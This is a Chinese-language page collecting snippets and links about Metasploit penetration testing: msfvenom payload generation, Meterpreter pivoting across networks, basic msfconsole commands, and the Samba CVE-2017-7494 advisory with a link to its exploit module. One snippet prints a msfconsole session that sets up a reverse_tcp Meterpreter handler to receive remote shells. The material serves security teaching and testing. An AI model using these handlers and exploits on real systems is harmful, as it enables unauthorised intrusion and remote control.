网络渗透
msfvenom参数详解
metasploit-framework旗下的msfpayload(荷载生成器),msfencoder(编码器),msfcli(监听接口)已然成为历史,取而代之的是msfvenom。 正所谓万变不离其宗,了解原理是最重要的。现在,metasploit-framework完美搭档是msfvenom+msfcosole 下面,我们就来看一下msfvenom。root@localhost:~# m
Original link
图解Meterpreter实现网络穿透的方法 - FreeBuf.COM | 关注黑客与极客
纵深防御也被被称之为"多层防御",这样的概念被运用于"信息安全"上。以多层电脑安全技术去减轻其风险,在其中有些电脑被入侵或是泄密时,风险可以大大降低。举例来说,防毒软件被安装于个人工作站上,电脑中病毒在防火墙与服务器等其它类似环境中被拦劫下来。在信息技术世界中占据着举足轻重的地位。本文我们将通过示例分析攻击者是如何运用各种方法进行网络穿透的。 确定设备如何在不同网络之间相互传输的过程,也即通过互联的网络把信息从源地址传输到目的地址的活动被称之为路由。通常用于执行路由活动的设备被称为路由器。通过使用路由表,路由器则规划网络包到各自目的地的线路。路由的功能不仅仅是诸如路由器等网络设备能够完成,在安装有该功能的任意计算机系统也能够完成。 根据上图例子所示,为了在192.168.1.0/24与192.168.10.0/24网络之间进行通信是需要一个路由表记录的。根据路由器中的规则定义,数据需要从192.168.1.0/24源网络发到192.168.10.0/24目的网络中去。网络数据包大概会经历如下过程: 基本上可以概括为,在正常情况下仅仅只是通过利用被控制的计算机我们可能依旧无法进行网络访问。假设一台被控制的计算机连接有多个网络,将其作为我们的跳板,那么网络隔离的手段对我们来说就形同虚设。跟着这个思路,攻击者在被控制的跳板主机上执行路由操作,进而访问隐藏的网络。对新发现网络发起的每个请求都会通过中间的双网卡跳板传输,形象化一点说来就像是洞子一般。 就如上面所示的拓扑图,设备有两张网卡可访问192.168.1.0/24以及192.168.10.0/24两个网络。在正常情况下,这两个网络之间是不能相互访问的,除非有定义路由规则。根据该结构,授权用户(使用两张网卡的计算机)可访问DMZ区内的一些服务。 根据我们的攻击场景,先拿下命名为RD的主机然后获取到的meterpreter shell,RD能连接到DMZ网络。随后,在信息收集过程中确定了目标有两张网卡。注意:环境中的路由器在两个网络之间并没有联通。 msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 172.16.0.20 LHOST => 172.16.0.20 msf exploit(handler) > set LPORT 1234 LPORT => 1234 msf exploit(handler) > run [*] Started reverse TCP handler on 172.16.0.20:1234 [*] Starting the payload handler...
Original link
msfvenom生成各类Payload命令 - 火云笔记
msfvenom生成各类Payload命令,包括Windows、Linux平台下的以及PHP、JSP等web用Payload
Original link
给kali的Metasploit下添加一个新的exploit - - 博客频道 - CSDN.NET
首先在/usr/share/metasploit-framework/modules/exploits/目录下新建一个自定义文件夹,例如
Original link
metasploit常用渗透命令 - 软件工具 - 红黑联盟
svn update 升级./msfweb Web接口127.0.0.1:55555。../msfconsole 字符下的Console。help 帮助show 显示选项search 搜索名字use 使用漏洞show options 显示选项se...
Original link
[转帖]Samba远程代码执行漏洞(CVE-2017-7494) 附加:测试环境-『WEB安全』-看雪安全论坛

2017年5月24日Samba发布了4.6.4版本,中间修复了一个严重的远程代码执行漏洞,漏洞编号CVE-2017-7494,漏洞影响了Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中间的所有版本。
Remote code execution from a writable share.(https://www.samba.org/samba/security/CVE-2017-7494.html

漏洞编号:CVE-2017-7494
危害等级:严重
影响版本:Samba 3.5.0 和包括4.6.4/4.5.10/4.4.14中间版本
漏洞描述:2017年5月24日Samba发布了4.6.4版本,修复了一个严重的远程代码执行漏洞,该漏洞影响了Samba 3.5.0 和包括4.6.4/4.5.10/4.4.14中间的版本。

MSF EXP模块:https://github.com/hdm/metasploit-framework/blob/0520d7cf76f8e5e654cb60f157772200c1b9e230/modules/exploits/linux/samba/is_known_pipename.rb
翻译分析:http://bobao.360.cn/learning/detail/3900.html
git讨论:https://github.com/rapid7/metasploit-framework/pull/8450
测试环境镜像:http://mp.weixin.qq.com/s/PPcIhfkrJGoOEf7-Skvr-A

Original link